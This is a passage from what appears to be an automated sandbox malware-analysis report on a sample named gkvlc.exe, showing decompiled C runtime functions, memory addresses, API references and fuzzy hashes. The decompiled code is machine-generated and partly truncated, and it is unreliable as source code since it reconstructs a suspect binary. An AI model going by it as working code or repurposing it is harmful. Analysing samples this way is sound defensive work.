											E00406AE1(_a4, 0xfffffffe, 0xffffffff, 1);
											_t120 = _v16;
											_t130 = _t130 + 0x10;
											_t99 = 0xa;
											if(_v8 == _t99) {
												L29:
												_t111 = _v12;
												goto L30;
											}
											L27:
											_t89 = 0xd;
											L28:
											 *_t126 = _t89;
											_t126 =  &(_t126[1]);
											goto L29;
										} else {
											 *_t126 = _t97;
											_t126 =  &(_t126[1]);
											L23:
											_t120 = _v16;
											L30:
											_t75 =  &_v20; // 0x406750
											if(_t120 <  *_t75) {
												continue;
											}
											goto L35;
										}
									}
									_t121 = _v8;
									_t100 =  &(_t126[1]);
									_v32 = _t100;
									if(_t121 != _v44) {
										_t101 = 0xd;
										 *_t126 = _t101;
										 *(_t125 +  *((intOrPtr*)(0x417ed8 + _t111 * 4)) + 0x2a) = _t121;
										 *((char*)(_t125 +  *((intOrPtr*)(0x417ed8 + _t111 * 4)) + 0x2b)) = _t121 >> 8;
										_t123 = 0xa;
										 *((char*)(_t125 +  *((intOrPtr*)(0x417ed8 + _t111 * 4)) + 0x2c)) = _t123;
										_t100 = _v32;
									} else {
										_t124 = 0xa;
										 *_t126 = _t124;
									}
									_t126 = _t100;
									goto L23;
								}
							}
							_v16 =  *_t113 & 0x0000ffff;
							_v32 =  &(_t126[1]);
							_t109 = 0xa;
							if(_v16 == _t109) {
								_t89 = _t109;
							}
							_t108 = _a8;
							 *_t126 = _t89;
							_t126 = _v32;
							_t120 = _t120 + 2 + (0 | _v16 == _t109) * 2;
							goto L29;
						}
						_t120 = _t113;
						goto L28;
					}
					_t112 =  *((intOrPtr*)(0x417ed8 + _t111 * 4));
					_t90 =  *(_t112 + _t125 + 0x28);
					if((_t90 & 0x00000040) != 0) {
						_t91 = 0x1a;
						 *_t126 = _t91;
						_t126 =  &(_t126[1]);
					} else {
						 *(_t112 + _t125 + 0x28) = _t90 | 0x00000002;
					}
					goto L35;
				}
				_t129 = 0xa;
				if( *_t108 != _t129) {
					goto L3;
				}
				 *(_t125 + _t86 + 0x28) =  *(_t125 + _t86 + 0x28) | 0x00000004;
				goto L4;
			}





































                                                                                            0x00405f4a
                                                                                            0x00405f50
                                                                                            0x00405f57
                                                                                            0x00405f5b
                                                                                            0x00405f5e
                                                                                            0x00405f61
                                                                                            0x00405f68
                                                                                            0x00405f73
                                                                                            0x00405f76
                                                                                            0x00405f76
                                                                                            0x00405f7b
                                                                                            0x00405f8c
                                                                                            0x00405f8c
                                                                                            0x00405f91
                                                                                            0x00405f91
                                                                                            0x00405f94
                                                                                            0x00405f96
                                                                                            0x00405f99
                                                                                            0x00405f9d
                                                                                            0x00406107
                                                                                            0x00406112
                                                                                            0x00406112
                                                                                            0x00405fa3
                                                                                            0x00405faa
                                                                                            0x00405fb1
                                                                                            0x00405fb1
                                                                                            0x00405fb8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405fbe
                                                                                            0x00405fc5
                                                                                            0x00405fce
                                                                                            0x00405fd1
                                                                                            0x00406013
                                                                                            0x00406028
                                                                                            0x004060cd
                                                                                            0x00000000
                                                                                            0x00406038
                                                                                            0x00406038
                                                                                            0x00406047
                                                                                            0x00406098
                                                                                            0x0040609d
                                                                                            0x004060b7
                                                                                            0x004060bc
                                                                                            0x004060bf
                                                                                            0x004060c4
                                                                                            0x004060c9
                                                                                            0x004060d9
                                                                                            0x004060d9
                                                                                            0x00000000
                                                                                            0x004060d9
                                                                                            0x004060d0
                                                                                            0x004060d2
                                                                                            0x004060d3
                                                                                            0x004060d3
                                                                                            0x004060d6
                                                                                            0x00000000
                                                                                            0x004060a3
                                                                                            0x004060a3
                                                                                            0x004060a6
                                                                                            0x004060a9
                                                                                            0x004060a9
                                                                                            0x004060dc
                                                                                            0x004060dc
                                                                                            0x004060df
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004060e5
                                                                                            0x0040609d
                                                                                            0x00406049
                                                                                            0x0040604d
                                                                                            0x00406050
                                                                                            0x00406057
                                                                                            0x00406063
                                                                                            0x00406064
                                                                                            0x00406070
                                                                                            0x0040607f
                                                                                            0x0040608a
                                                                                            0x0040608b
                                                                                            0x0040608f
                                                                                            0x00406059
                                                                                            0x0040605b
                                                                                            0x0040605c
                                                                                            0x0040605c
                                                                                            0x00406092
                                                                                            0x00000000
                                                                                            0x00406092
                                                                                            0x00406028
                                                                                            0x00405fd6
                                                                                            0x00405fde
                                                                                            0x00405fe4
                                                                                            0x00405fe8
                                                                                            0x00405feb
                                                                                            0x00405feb
                                                                                            0x00405ff4
                                                                                            0x00405ffa
                                                                                            0x00405ffd
                                                                                            0x00406007
                                                                                            0x00000000
                                                                                            0x00406007
                                                                                            0x00405fc7
                                                                                            0x00000000
                                                                                            0x00405fc7
                                                                                            0x004060e7
                                                                                            0x004060ee
                                                                                            0x004060f4
                                                                                            0x00406100
                                                                                            0x00406101
                                                                                            0x00406104
                                                                                            0x004060f6
                                                                                            0x004060f8
                                                                                            0x004060f8
                                                                                            0x00000000
                                                                                            0x004060f4
                                                                                            0x00405f7f
                                                                                            0x00405f83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00405f85
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • ReadFile.KERNEL32(?,00000000,00000002,?,00000000,00000000,00000000,?), ref: 00406020
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID: Pg@$Pg@
                                                                                            • API String ID: 2738559852-3963091787
                                                                                            • Opcode ID: 1a914d2d055d9eb85c88ac7b66820232191f87f729b06c9c4c71bf85d3e15aa6
                                                                                            • Instruction ID: 6ab30e30d21f3dd1c43522c991c0f9d41636db0c91330b0776422271b857a7e5
                                                                                            • Opcode Fuzzy Hash: 1a914d2d055d9eb85c88ac7b66820232191f87f729b06c9c4c71bf85d3e15aa6
                                                                                            • Instruction Fuzzy Hash: 9751E431A44216EBCB20DF58C881AEEB7B0FF09314F21856AE456BB3D1D3789D91CB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403C51 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E00403C51(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E00407F0F(_t48);
						E00407950(_t48, _t57, 0, 0x417d60, 0, 0x417d60, 0x104);
						_t26 =  *0x417e94; // 0x7a3488
						 *0x417e84 = 0x417d60;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x417d60;
							_v20 = 0x417d60;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E00403EFE(E00403D87( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E00403D87( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E00407843(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x417e88 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x417e8c = _t58;
											L18:
											E00406FE2(_t37);
											_v12 = 0;
											L19:
											E00406FE2(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x417e88 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x417e8c = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E0040514F(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E0040514F(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E0040506E();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

























                                                                                            0x00403c51
                                                                                            0x00403c5a
                                                                                            0x00403c5f
                                                                                            0x00403c69
                                                                                            0x00403c6c
                                                                                            0x00403c89
                                                                                            0x00403c8a
                                                                                            0x00403c9d
                                                                                            0x00403ca2
                                                                                            0x00403caa
                                                                                            0x00403cb0
                                                                                            0x00403cb3
                                                                                            0x00403cb5
                                                                                            0x00403cbc
                                                                                            0x00403cbc
                                                                                            0x00403cbe
                                                                                            0x00403cc1
                                                                                            0x00403cc4
                                                                                            0x00403ccb
                                                                                            0x00403ce4
                                                                                            0x00403ce9
                                                                                            0x00403ceb
                                                                                            0x00403d0c
                                                                                            0x00403d14
                                                                                            0x00403d17
                                                                                            0x00403d32
                                                                                            0x00403d35
                                                                                            0x00403d3c
                                                                                            0x00403d40
                                                                                            0x00403d42
                                                                                            0x00403d49
                                                                                            0x00403d4c
                                                                                            0x00403d4e
                                                                                            0x00403d50
                                                                                            0x00403d52
                                                                                            0x00403d5c
                                                                                            0x00403d5c
                                                                                            0x00403d5e
                                                                                            0x00403d64
                                                                                            0x00403d67
                                                                                            0x00403d69
                                                                                            0x00403d6f
                                                                                            0x00403d70
                                                                                            0x00403d76
                                                                                            0x00403d79
                                                                                            0x00403d7a
                                                                                            0x00403d80
                                                                                            0x00403d83
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403d54
                                                                                            0x00403d54
                                                                                            0x00403d54
                                                                                            0x00403d57
                                                                                            0x00403d58
                                                                                            0x00403d58
                                                                                            0x00000000
                                                                                            0x00403d54
                                                                                            0x00403d44
                                                                                            0x00000000
                                                                                            0x00403d44
                                                                                            0x00403d1c
                                                                                            0x00403d1c
                                                                                            0x00403d1d
                                                                                            0x00403d22
                                                                                            0x00403d24
                                                                                            0x00403d26
                                                                                            0x00403d2b
                                                                                            0x00403d2b
                                                                                            0x00000000
                                                                                            0x00403d2b
                                                                                            0x00403ced
                                                                                            0x00403cf2
                                                                                            0x00403cf4
                                                                                            0x00403cf5
                                                                                            0x00000000
                                                                                            0x00403cf5
                                                                                            0x00403cb7
                                                                                            0x00403cba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403cba
                                                                                            0x00403c6e
                                                                                            0x00403c71
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403c73
                                                                                            0x00403c7a
                                                                                            0x00403c7b
                                                                                            0x00403c7d
                                                                                            0x00403c82
                                                                                            0x00000000
                                                                                            0x00403c82
                                                                                            0x00000000

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\gkvlc.exe
                                                                                            • API String ID: 0-3342847095
                                                                                            • Opcode ID: e656e57d8ffcca0d32e77a56b20cef21789087731cb57e919da55b697be2cbe2
                                                                                            • Instruction ID: 92712c4628ee54ef2a21c96a11144accea7a57818d60143936deda402fef6225
                                                                                            • Opcode Fuzzy Hash: e656e57d8ffcca0d32e77a56b20cef21789087731cb57e919da55b697be2cbe2
                                                                                            • Instruction Fuzzy Hash: 9B416171A04214ABDB219F9AD8819AFBFBCEF85700F1440BBE405B7391D6B89F40DB59
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401C75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 91%
                                                                                            			E00401C75(void* __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v808;
				int _t10;
				intOrPtr _t15;
				signed int _t16;
				signed int _t18;
				signed int _t20;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				intOrPtr* _t33;
				void* _t36;

				_t29 = __esi;
				_t28 = __edi;
				_t27 = __edx;
				_t24 = __ecx;
				_t23 = __ebx;
				_t36 = _t24 -  *0x417094; // 0xa69f0419
				if(_t36 != 0) {
					_t31 = _t33;
					_t10 = IsProcessorFeaturePresent(0x17);
					if(_t10 != 0) {
						_t24 = 2;
						asm("int 0x29");
					}
					 *0x417a90 = _t10;
					 *0x417a8c = _t24;
					 *0x417a88 = _t27;
					 *0x417a84 = _t23;
					 *0x417a80 = _t29;
					 *0x417a7c = _t28;
					 *0x417aa8 = ss;
					 *0x417a9c = cs;
					 *0x417a78 = ds;
					 *0x417a74 = es;
					 *0x417a70 = fs;
					 *0x417a6c = gs;
					asm("pushfd");
					_pop( *0x417aa0);
					 *0x417a94 =  *_t31;
					 *0x417a98 = _v0;
					 *0x417aa4 =  &_a4;
					 *0x4179e0 = 0x10001;
					_t15 =  *0x417a98; // 0x0
					 *0x41799c = _t15;
					 *0x417990 = 0xc0000409;
					 *0x417994 = 1;
					 *0x4179a0 = 1;
					_t16 = 4;
					 *((intOrPtr*)(0x4179a4 + _t16 * 0)) = 2;
					_t18 = 4;
					_t25 =  *0x417094; // 0xa69f0419
					 *((intOrPtr*)(_t31 + _t18 * 0 - 8)) = _t25;
					_t20 = 4;
					_t26 =  *0x417098; // 0x5960fbe6
					 *((intOrPtr*)(_t31 + (_t20 << 0) - 8)) = _t26;
					return E00401C83(0x4102ec);
				} else {
					return __eax;
				}
			}




















                                                                                            0x00401c75
                                                                                            0x00401c75
                                                                                            0x00401c75
                                                                                            0x00401c75
                                                                                            0x00401c75
                                                                                            0x00401c75
                                                                                            0x00401c7b
                                                                                            0x00401cac
                                                                                            0x00401cb6
                                                                                            0x00401cbe
                                                                                            0x00401cc2
                                                                                            0x00401cc3
                                                                                            0x00401cc3
                                                                                            0x00401cc5
                                                                                            0x00401cca
                                                                                            0x00401cd0
                                                                                            0x00401cd6
                                                                                            0x00401cdc
                                                                                            0x00401ce2
                                                                                            0x00401ce8
                                                                                            0x00401cef
                                                                                            0x00401cf6
                                                                                            0x00401cfd
                                                                                            0x00401d04
                                                                                            0x00401d0b
                                                                                            0x00401d12
                                                                                            0x00401d13
                                                                                            0x00401d1c
                                                                                            0x00401d24
                                                                                            0x00401d2c
                                                                                            0x00401d37
                                                                                            0x00401d41
                                                                                            0x00401d46
                                                                                            0x00401d4b
                                                                                            0x00401d55
                                                                                            0x00401d5f
                                                                                            0x00401d6b
                                                                                            0x00401d6f
                                                                                            0x00401d7b
                                                                                            0x00401d7f
                                                                                            0x00401d85
                                                                                            0x00401d8b
                                                                                            0x00401d8f
                                                                                            0x00401d95
                                                                                            0x00401da4
                                                                                            0x00401c7d
                                                                                            0x00401c7d
                                                                                            0x00401c7d

                                                                                            APIs
                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00401CB6
                                                                                            • ___raise_securityfailure.LIBCMT ref: 00401D9E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                            • String ID: tpA
                                                                                            • API String ID: 3761405300-2187137390
                                                                                            • Opcode ID: 8ab60731310f68762e5aeae401797b94996048f0792242e98606beb5f153cf0e
                                                                                            • Instruction ID: 47466516dcccb19ef99ac0e375faec2952f86b45b96601e8c8d6269c5e037c1b
                                                                                            • Opcode Fuzzy Hash: 8ab60731310f68762e5aeae401797b94996048f0792242e98606beb5f153cf0e
                                                                                            • Instruction Fuzzy Hash: B121E2B55992009EE300CF69ED467893BB4BF08394F10907AE5098BBB1E3B59A84CB0C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040555D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 76%
                                                                                            			E0040555D(void* __ebx, void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t1;
				signed int _t2;
				intOrPtr _t5;
				signed int _t6;
				void* _t25;
				signed int _t26;
				void* _t28;
				void* _t33;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				long _t40;
				void* _t43;

				_t33 = __edx;
				_t28 = __ecx;
				_t25 = __ebx;
				_t1 =  *0x4170d8; // 0xb
				_push(_t39);
				_t45 = _t1 - 0xffffffff;
				if(_t1 == 0xffffffff) {
					L5:
					_t2 = E004096D6(__eflags, _t1, 0xffffffff);
					__eflags = _t2;
					if(_t2 == 0) {
						goto L14;
					} else {
						_t39 = E00406F85(1, 0x364);
						_pop(_t28);
						__eflags = _t39;
						if(__eflags != 0) {
							__eflags = E004096D6(__eflags,  *0x4170d8, _t39);
							if(__eflags != 0) {
								E004052CE(_t39, "\xef\xbf\								E00406FE2(0);
								_t43 = _t43 + 0xc;
								goto L12;
							} else {
								E004096D6(__eflags,  *0x4170d8, _t17);
								_push(_t39);
								goto L8;
							}
						} else {
							E004096D6(__eflags,  *0x4170d8, _t16);
							_push(_t39);
							L8:
							E00406FE2();
							_pop(_t28);
							goto L14;
						}
					}
				} else {
					_t39 = E00409697(_t45, _t1);
					if(_t39 == 0) {
						_t1 =  *0x4170d8; // 0xb
						goto L5;
					} else {
						if(_t39 == 0xffffffff) {
							L14:
							E00404DB6(_t25, _t28, _t33, _t39);
							asm("int3");
							_push(_t25);
							_push(_t39);
							_t40 = GetLastError();
							_t5 =  *0x4170d8; // 0xb
							__eflags = _t5 - 0xffffffff;
							if(__eflags == 0) {
								L21:
								_t6 = E004096D6(__eflags, _t5, 0xffffffff);
								__eflags = _t6;
								if(_t6 == 0) {
									goto L18;
								} else {
									_t35 = E00406F85(1, 0x364);
									__eflags = _t35;
									if(__eflags != 0) {
										__eflags = E004096D6(__eflags,  *0x4170d8, _t35);
										if(__eflags != 0) {
											E004052CE(_t35, "\xef\xbf\											E00406FE2(0);
											goto L28;
										} else {
											_t26 = 0;
											E004096D6(__eflags,  *0x4170d8, 0);
											_push(_t35);
											goto L24;
										}
									} else {
										_t26 = 0;
										__eflags = 0;
										E004096D6(0,  *0x4170d8, 0);
										_push(0);
										L24:
										E00406FE2();
										goto L19;
									}
								}
							} else {
								_t35 = E00409697(__eflags, _t5);
								__eflags = _t35;
								if(__eflags == 0) {
									_t5 =  *0x4170d8; // 0xb
									goto L21;
								} else {
									__eflags = _t35 - 0xffffffff;
									if(_t35 != 0xffffffff) {
										L28:
										_t26 = _t35;
									} else {
										L18:
										_t26 = 0;
										__eflags = 0;
										L19:
										_t35 = _t26;
									}
								}
							}
							SetLastError(_t40);
							asm("sbb edi, edi");
							_t37 =  ~_t35 & _t26;
							__eflags = _t37;
							return _t37;
						} else {
							L12:
							if(_t39 == 0) {
								goto L14;
							} else {
								return _t39;
							}
						}
					}
				}
			}

















                                                                                            0x0040555d
                                                                                            0x0040555d
                                                                                            0x0040555d
                                                                                            0x0040555d
                                                                                            0x00405562
                                                                                            0x00405563
                                                                                            0x00405566
                                                                                            0x00405580
                                                                                            0x00405583
                                                                                            0x00405588
                                                                                            0x0040558a
                                                                                            0x00000000
                                                                                            0x0040558c
                                                                                            0x00405598
                                                                                            0x0040559b
                                                                                            0x0040559c
                                                                                            0x0040559e
                                                                                            0x004055c1
                                                                                            0x004055c3
                                                                                            0x004055da
                                                                                            0x004055e1
                                                                                            0x004055e6
                                                                                            0x00000000
                                                                                            0x004055c5
                                                                                            0x004055cc
                                                                                            0x004055d1
                                                                                            0x00000000
                                                                                            0x004055d1
                                                                                            0x004055a0
                                                                                            0x004055a7
                                                                                            0x004055ac
                                                                                            0x004055ad
                                                                                            0x004055ad
                                                                                            0x004055b2
                                                                                            0x00000000
                                                                                            0x004055b2
                                                                                            0x0040559e
                                                                                            0x00405568
                                                                                            0x0040556e
                                                                                            0x00405572
                                                                                            0x0040557b
                                                                                            0x00000000
                                                                                            0x00405574
                                                                                            0x00405577
                                                                                            0x004055f1
                                                                                            0x004055f1
                                                                                            0x004055f6
                                                                                            0x004055f9
                                                                                            0x004055fa
                                                                                            0x00405602
                                                                                            0x00405604
                                                                                            0x00405609
                                                                                            0x0040560c
                                                                                            0x0040562a
                                                                                            0x0040562d
                                                                                            0x00405632
                                                                                            0x00405634
                                                                                            0x00000000
                                                                                            0x00405636
                                                                                            0x00405642
                                                                                            0x00405646
                                                                                            0x00405648
                                                                                            0x0040566d
                                                                                            0x0040566f
                                                                                            0x00405688
                                                                                            0x0040568f
                                                                                            0x00000000
                                                                                            0x00405671
                                                                                            0x00405671
                                                                                            0x0040567a
                                                                                            0x0040567f
                                                                                            0x00000000
                                                                                            0x0040567f
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x0040564a
                                                                                            0x00405653
                                                                                            0x00405658
                                                                                            0x00405659
                                                                                            0x00405659
                                                                                            0x00000000
                                                                                            0x0040565e
                                                                                            0x00405648
                                                                                            0x0040560e
                                                                                            0x00405614
                                                                                            0x00405616
                                                                                            0x00405618
                                                                                            0x00405625
                                                                                            0x00000000
                                                                                            0x0040561a
                                                                                            0x0040561a
                                                                                            0x0040561d
                                                                                            0x00405697
                                                                                            0x00405697
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x0040561f
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x00405621
                                                                                            0x0040561d
                                                                                            0x00405618
                                                                                            0x0040569a
                                                                                            0x004056a2
                                                                                            0x004056a4
                                                                                            0x004056a4
                                                                                            0x004056ab
                                                                                            0x00405579
                                                                                            0x004055e9
                                                                                            0x004055eb
                                                                                            0x00000000
                                                                                            0x004055ed
                                                                                            0x004055f0
                                                                                            0x004055f0
                                                                                            0x004055eb
                                                                                            0x00405577
                                                                                            0x00405572

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free
                                                                                            • String ID: pA
                                                                                            • API String ID: 269201875-3402996844
                                                                                            • Opcode ID: 687c1e3d586f2d80ca602ba96861d42d6f2be44dcdffcca1d0c683c2787723e2
                                                                                            • Instruction ID: 25627700b7098faac27ae7e6bc3d23e1ff54b56b77b3389a9cc4c373e4e0ef97
                                                                                            • Opcode Fuzzy Hash: 687c1e3d586f2d80ca602ba96861d42d6f2be44dcdffcca1d0c683c2787723e2
                                                                                            • Instruction Fuzzy Hash: 4201D83194AF2177C5213226EC02E9B351A9F01778B154637FC28B51EAE93DCE418ADD
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0040AF68 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 89%
                                                                                            			E0040AF68(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				int _t26;
				signed int _t42;
				void* _t44;

				_push(0xc);
				_push(0x4155f0);
				E00401A50(__ebx, __edi, __esi);
				_t42 = 0;
				 *(_t44 - 0x1c) = 0;
				E00408937( *((intOrPtr*)( *((intOrPtr*)(_t44 + 8)))));
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(( *( *((intOrPtr*)(0x417ed8 + ( *( *( *(_t44 + 0xc))) >> 6) * 4)) + 0x28 + ( *( *( *(_t44 + 0xc))) & 0x0000003f) * 0x38) & 0x00000001) == 0) {
					L3:
					 *((intOrPtr*)(E0040514F(_t49))) = 9;
					_t42 = _t42 | 0xffffffff;
				} else {
					_t26 = FlushFileBuffers(E00408BB3(_t39));
					_t49 = _t26;
					if(_t26 == 0) {
						_t42 = E0040513C(_t49);
						 *_t42 = GetLastError();
						goto L3;
					}
				}
				 *(_t44 - 0x1c) = _t42;
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E0040AFFE();
				_t13 = _t44 - 0x10; // 0x406c73
				 *[fs:0x0] =  *_t13;
				return _t42;
			}






                                                                                            0x0040af68
                                                                                            0x0040af6a
                                                                                            0x0040af6f
                                                                                            0x0040af74
                                                                                            0x0040af76
                                                                                            0x0040af7e
                                                                                            0x0040af84
                                                                                            0x0040afa7
                                                                                            0x0040afca
                                                                                            0x0040afcf
                                                                                            0x0040afd5
                                                                                            0x0040afa9
                                                                                            0x0040afb1
                                                                                            0x0040afb7
                                                                                            0x0040afb9
                                                                                            0x0040afc0
                                                                                            0x0040afc8
                                                                                            0x00000000
                                                                                            0x0040afc8
                                                                                            0x0040afb9
                                                                                            0x0040afd8
                                                                                            0x0040afdb
                                                                                            0x0040afe2
                                                                                            0x0040afe9
                                                                                            0x0040afec
                                                                                            0x0040aff8

                                                                                            APIs
                                                                                              • Part of subcall function 00408937: EnterCriticalSection.KERNEL32(004033BF,?,0040B864,004033BF,00415610,00000010,00406D16,00000000,8304488B,00401056,00401056,?,?,004033BF,00000000,00401056), ref: 00408952
                                                                                            • FlushFileBuffers.KERNEL32(00000000,004155F0,0000000C,0040B06F,sl@,?,00000001,?,00406C73,?), ref: 0040AFB1
                                                                                            • GetLastError.KERNEL32 ref: 0040AFC2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                            • String ID: sl@
                                                                                            • API String ID: 4109680722-375548448
                                                                                            • Opcode ID: ba0f2d0971300410e8b4391811e07ab09f3e67430bd2774c21b8560fe12f6b47
                                                                                            • Instruction ID: d22ab323785118534dadb6025438f59190700326f3c98eb97baf0e0e8c99e7c4
                                                                                            • Opcode Fuzzy Hash: ba0f2d0971300410e8b4391811e07ab09f3e67430bd2774c21b8560fe12f6b47
                                                                                            • Instruction Fuzzy Hash: D60180B2A003059FC714AFA9D905A9E7BE1EF49764F10416FF411AB3E1DB7899418B48
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Execution Graph

                                                                                            Execution Coverage:4.2%
                                                                                            Dynamic/Decrypted Code Coverage:2.5%
                                                                                            Signature Coverage:4.5%
